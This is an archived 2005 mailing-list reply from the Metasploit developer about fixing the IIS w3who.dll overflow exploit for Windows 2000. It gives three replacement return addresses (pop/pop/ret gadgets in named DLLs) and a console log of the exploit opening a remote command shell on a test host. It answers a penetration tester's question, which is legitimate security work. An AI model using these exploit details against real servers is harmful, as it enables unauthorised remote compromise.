From: H D Moore (sflist@digitaloffense.net)
Date: Sat Jan 15 2005 - 02:56:01 EST
The return address for Windows 2000 fails because the ImageBase for the
DLL is different. I forget to check the base address on 2000 after fixing
the code to work on Windows XP SP2 :-(
A new module will be posted to metasploit.com shortly. In the meantime,
just change the return address in the Targets section to one of the
following:
0x01169f4a (pop eax, pop ebp, ret @w3who.dll w/base 0x01150000)
0x75022ac4 (pop esi, pop ebx, ret @ws2help.dll [Win2k English])
0x750236b1 (pop esi, pop ebx, ret @ws2help.dll [Win2k English])
If you run into any other bugs or reliability problems with the Metasploit
Framework, *please* drop us an email at msfdev[at]metasploit.com :-)
-HD
--- msf iis_w3who_overflow(win32_bind) > exploit [*] Starting Bind Handler. [*] Attempting to exploit target Windows 2000 RESKIT DLL (Win2000) [*] Sending 8254 bytes to remote host. [*] Waiting for a response... [*] Got connection from 192.168.0.100:34885 <-> 192.168.0.237:4444 Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. C:\WINNT\system32> On Friday 14 January 2005 02:49, Martin Bernhard wrote: > Hi, > > As one of our clients is running some IIS web servers with w3who.dll on > them, I figured that this would be a good place to start our pen test. > Unfortunately, the exploit in the new release of the Metasploit > Framework did not work on the most important servers (Windows 2000). I > have access to a test system that gives me the opportunity to analyze > the bug in detail, but I can’t figure out what parts in memory are > overwritten. Does anybody know what exactly I have to do to trigger the > bug and analyze it (I’m using ollydbg)? > > Any help is much appreciated
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:54:13 EDT